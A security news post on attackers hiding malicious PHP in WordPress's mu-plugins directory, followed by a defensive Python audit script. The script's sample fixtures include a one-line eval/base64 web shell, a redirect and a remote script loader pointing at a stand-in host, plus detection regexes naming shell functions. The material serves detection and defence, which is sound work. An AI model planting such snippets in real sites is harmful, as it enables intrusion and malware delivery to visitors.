WordPress Woes: Hackers Hide in Plain Sight with “Mu-Plugins” Trickery!
Threat actors are taking a page from WordPress’s own playbook, using the mu-plugins (“must-use plugins”) directory, wp-content/mu-plugins, to hide malicious code. Any PHP file placed at the top level of that directory is loaded by WordPress on every request with no activation step, is listed only under a separate “Must-Use” tab rather than in the normal plugin list, and cannot be deactivated from the dashboard; the only way to switch it off is to delete the file. That makes it a convenient hiding place for attackers, who are abusing it to redirect visitors to fake sites and wreak digital havoc. It’s like a bad magic trick, minus the rabbit.

Hot Take:
Who knew that hiding malware could be as easy as tucking it away in WordPress’s version of the sock drawer? Looks like the mu-plugins directory just became the hottest real estate for cybercriminals looking to sneak their malicious antics past unsuspecting site owners. Time to step up those security checks, folks, because it seems like even our plugins are plotting against us!
Key Points:
- The “mu-plugins” directory in WordPress is being abused by attackers to hide malicious code that runs automatically on every page load.
- Three rogue PHP files were identified: redirect.php, index.php (a web shell), and custom-js-loader.php.
- redirect.php sends visitors to a fake browser-update page designed to trick them into installing malware.
- Threat actors also use hacked WordPress sites for other malicious activity, such as distributing the Lumma Stealer malware.
- The initial compromise often stems from outdated plugins, compromised credentials, and server misconfigurations.
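A practical check for the behaviour described above, added here as an example and not code from the original report or from WordPress: a small Python audit that walks wp-content/mu-plugins, flags files that are not on an operator-maintained allow-list, flags the three file names named in the report, refuses to accept an index.php that is anything other than WordPress’s empty “Silence is golden” stub, and greps PHP bodies for common web-shell and redirect indicators. The allow-list, the indicator regexes and the sample file bodies are all assumptions constructed for the demo; the malicious snippets are illustrative stand-ins, not the campaign’s real code.

```python
"""Audit a WordPress wp-content/mu-plugins directory for rogue files (added example)."""
import os
import re
import tempfile

# File names called out in the report summarised above.
REPORTED_ROGUE_NAMES = {"redirect.php", "index.php", "custom-js-loader.php"}

# Generic web-shell / loader / redirect indicators. Hypothetical set chosen for this
# example; tune it to your own baseline, it is not from the original report.
SUSPICIOUS_PATTERNS = [
    r"\beval\s*\(",
    r"\bbase64_decode\s*\(",
    r"\bgzinflate\s*\(",
    r"\bstr_rot13\s*\(",
    r"\b(system|shell_exec|passthru|exec|popen|proc_open)\s*\(",
    r"\$_(GET|POST|REQUEST|COOKIE)\s*\[[^\]]+\]\s*\(",  # callable built from request input
    r"\bfile_put_contents\s*\(",
    r"\bcreate_function\s*\(",
    r"(wp_redirect|header\s*\(\s*['\"]Location:)",      # redirect primitives
    r"https?://[^\s'\"]+",                              # hard-coded external URLs
]
COMPILED = [re.compile(p, re.IGNORECASE) for p in SUSPICIOUS_PATTERNS]

# The only content WordPress itself ships in a directory-index stub.
SILENCE_STUB = re.compile(r"^\s*<\?php\s*(//\s*Silence is golden\.?)?\s*$")

PHP_EXTENSIONS = (".php", ".phtml", ".php7", ".inc")


def audit_mu_plugins(mu_dir, expected_files=()):
    """Return {relative_path: [reasons]} for every file worth a human look.

    expected_files is the operator's allow-list of relative paths the deployment is
    known to ship (hypothetical; an empty list means 'everything is unknown').
    Subdirectories are walked too: WordPress only auto-loads top-level PHP files,
    but a tiny top-level loader can include anything below it.
    """
    expected = set(expected_files)
    findings = {}
    for root, _dirs, files in os.walk(mu_dir):
        for name in files:
            full = os.path.join(root, name)
            rel = os.path.relpath(full, mu_dir)
            reasons = []
            if rel not in expected:
                reasons.append("not in allow-list")
            if name in REPORTED_ROGUE_NAMES:
                reasons.append("filename matches reported campaign")
            if name.lower().endswith(PHP_EXTENSIONS):
                with open(full, "r", encoding="utf-8", errors="replace") as fh:
                    body = fh.read()
                if name == "index.php" and not SILENCE_STUB.match(body):
                    reasons.append("index.php is not the empty stub")
                hits = sorted({rx.pattern for rx in COMPILED if rx.search(body)})
                if hits:
                    reasons.append("suspicious code: " + "; ".join(hits))
            else:
                reasons.append("non-PHP file (not auto-loaded, check for a loader that includes it)")
            if reasons:
                findings[rel] = reasons
    return findings


def build_sample_tree():
    """Create a throw-away mu-plugins directory with CONSTRUCTED sample files.

    The three 'rogue' bodies are illustrative stand-ins for the file names in the
    report, not the real campaign's code; the fourth is a benign must-use plugin.
    """
    mu = tempfile.mkdtemp(prefix="mu-plugins-")
    samples = {
        "site-tweaks.php": "<?php\nadd_filter('login_errors', function () { return 'Login failed'; });\n",
        "redirect.php": "<?php\nif (!is_user_logged_in()) {\n    wp_redirect('https://example.invalid/update-browser');\n    exit;\n}\n",
        "index.php": "<?php\nif (isset($_REQUEST['c'])) { eval(base64_decode($_REQUEST['c'])); }\n",
        "custom-js-loader.php": "<?php\nadd_action('wp_footer', function () {\n    echo '<script src=\"https://example.invalid/loader.js\"></script>';\n});\n",
    }
    for name, body in samples.items():
        with open(os.path.join(mu, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return mu


if __name__ == "__main__":
    # Point mu_dir at a real wp-content/mu-plugins on a server; here we use the sample tree.
    sample = build_sample_tree()
    for rel, reasons in sorted(audit_mu_plugins(sample, expected_files=["site-tweaks.php"]).items()):
        print(f"{rel}: {'; '.join(reasons)}")
```

The allow-list check is the one that catches the quiet cases: a dropped file with an innocuous name and no obvious indicators still shows up as “not in allow-list”, so keep that list in version control with the rest of the deployment and treat any diff from it as an incident, not a cleanup task.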